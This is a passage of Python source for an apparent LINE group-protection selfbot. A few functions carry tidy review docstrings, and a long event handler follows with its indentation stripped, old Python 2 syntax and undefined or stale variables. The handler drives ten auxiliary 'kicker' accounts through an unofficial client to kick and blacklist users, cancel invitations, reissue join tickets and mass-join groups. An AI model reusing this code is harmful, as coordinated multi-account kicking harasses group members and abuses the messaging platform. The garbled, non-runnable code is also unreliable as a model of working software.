        'size': os.path.getsize(path),
        'type': 'image',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    with open(path, 'rb') as image_file:
        r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn',
                              data=data, files={'file': image_file})
    if r.status_code != 201:
        raise Exception('Upload image failure.')
    return True
def sendImage2(self, to_, path):
    """Variant of sendImage that uploads via the global ``cl`` client's
    endpoint (os.line.naver.jp).

    Fixes: the file was opened twice and never closed (handle leak) and
    fully read just to measure its size; it is now opened once in a
    with-block and sized via os.path.getsize.

    NOTE(review): here sendMessage is called without the leading 0 used
    elsewhere — kept as-is since the client signature is not visible.

    Raises Exception when the upload does not return HTTP 201.
    """
    M = Message(to=to_, contentType=1)
    M.contentMetadata = None
    M.contentPreview = None
    M_id = self._client.sendMessage(M).id
    params = {
        'name': 'media',
        'oid': M_id,
        'size': os.path.getsize(path),
        'type': 'image',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    with open(path, 'rb') as image_file:
        r = cl.post_content('https://os.line.naver.jp/talk/m/upload.nhn',
                            data=data, files={'file': image_file})
    if r.status_code != 201:
        raise Exception('Upload image failure.')
    return True
def sendMessage(to, text, contentMetadata=None, contentType=0):
    """Build a Message addressed to *to* and bump the per-target request counter.

    Fix: the mutable default argument ``contentMetadata={}`` was shared
    across all calls; it is now None with a fresh dict substituted per
    call (backward-compatible for callers).

    NOTE(review): the message is constructed and the counter in
    ``messageReq`` incremented, but nothing is sent here — presumably a
    caller or wrapper performs the actual send; confirm.
    """
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType = contentType
    mes.contentMetadata = {} if contentMetadata is None else contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
    """Record the display name of a member who read a tracked chat.

    op.param1 is used as the chat id keying ``wait2``'s read-tracking
    maps; op.param2 is presumably the reader's mid — confirm upstream.
    Best-effort: any lookup failure is silently ignored.
    """
    try:
        if op.param1 not in wait2['readPoint']:
            return
        reader = cl.getContact(op.param2).displayName
        if reader not in wait2['readMember'][op.param1]:
            # First read by this member: append to the visible list and
            # record the per-mid entry in the ROM map.
            wait2['readMember'][op.param1] += "\n・" + reader
            wait2['ROM'][op.param1][op.param2] = "・" + reader
    except:
        pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki1.getGroup(op.param1)
except:
try:
G = ki2.getGroup(op.param1)
except:
try:
G = ki3.getGroup(op.param1)
except:
try:
G = ki4.getGroup(op.param1)
except:
try:
G = ki5.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki1.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki3.updateGroup(G)
except:
try:
ki4.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"Group Name Lock")
ki1.sendText(op.param1,"Haddeuh dikunci Pe'a")
ki2.sendText(op.param1,"Wekawekaweka (Har Har)")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid1:
G = ki1.getGroup(op.param1)
G.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid2:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid4:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid5:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid6:
G = ki6.getGroup(op.param1)
G.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid7:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid8:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid9:
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid10:
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.param3 in Amid1:
if op.param2 in Amid2:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
ki1.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Amid2:
if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Amid3:
if op.param2 in Amid4:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in Amid4:
if op.param2 in Amid5:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in Amid5:
if op.param2 in Amid6:
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in Amid6:
if op.param2 in Amid7:
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in Amid7:
if op.param2 in Amid8:
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in Amid8:
if op.param2 in Amid9:
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in Amid9:
if op.param2 in Amid10:
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.param3 in Amid10:
if op.param2 in Amid1:
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
#===========================================
if op.type == 32:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SELF BOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SEL FBOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid1 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki1.cancelGroupInvitation(op.param1, matched_list)
if Amid2 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki2.cancelGroupInvitation(op.param1, matched_list)
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots:
if wait["protectionOn"] == True:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl1.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.1)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl1.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl1.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki1.getGroup(op.param1)
G.preventJoinByTicket = False
ki1.updateGroup(G)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid1 in op.param3:
if op.param2 in Bots:
pass
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ticket = ki1.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid2 in op.param3:
if op.param2 in Bots:
pass
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ticket = ki2.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid3 in op.param3:
if op.param2 in Bots:
pass
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid4 in op.param3:
if op.param2 in Bots:
pass
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid5 in op.param3:
if op.param2 in Bots:
pass
try:
ki6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid6 in op.param3:
if op.param2 in Bots:
pass
try:
ki7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ticket = ki6.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid7 in op.param3:
if op.param2 in Bots:
pass
try:
ki8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
